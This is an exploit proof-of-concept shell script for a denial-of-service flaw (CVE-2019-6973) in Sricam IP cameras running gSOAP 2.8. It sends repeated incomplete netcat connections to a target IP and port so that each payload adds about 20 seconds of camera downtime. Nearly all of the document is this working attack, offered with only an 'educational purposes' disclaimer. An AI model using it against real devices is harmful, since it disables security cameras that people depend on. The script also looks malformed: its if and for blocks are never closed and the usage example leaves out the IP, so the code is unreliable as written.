# Exploit Title: Sricam gSOAP 2.8 - Denial of Service
#Date: 25/01/2019
# Vendor Status: Informed (24/10/2018)
#CVE ID: CVE-2019-6973
#Exploit Author: Andrew Watson
# Contact: https://keybase.io/bitfu
#Software Version: Sricam gSOAP 2.8
# Vendor Homepage: http://www.sricam.com/
# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000
# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,
#exploitable by sending multiple incomplete requests.
#References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit
#DISCLAIMER: This proof of concept is provided for educational purposes only!
if [ -z "$3" ]; then
echo "#############################################################################"
echo -e "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
echo -e "\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>"
echo "[*] Example: $0 5000 10"
echo -e "\n[!] Each DoS payload sent adds another 20 seconds downtime.\n"
exit 0
time=$(expr $3 \* 20)
echo "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
echo -e "\n[+] Sending $3 DoS payloads..."
echo "[+] Expected downtime: $time seconds"
for dos in $(seq 1 $3); do
netcat $1 $2 &
echo -e "\n[!] $dos DoS payloads sent to: $1:$2"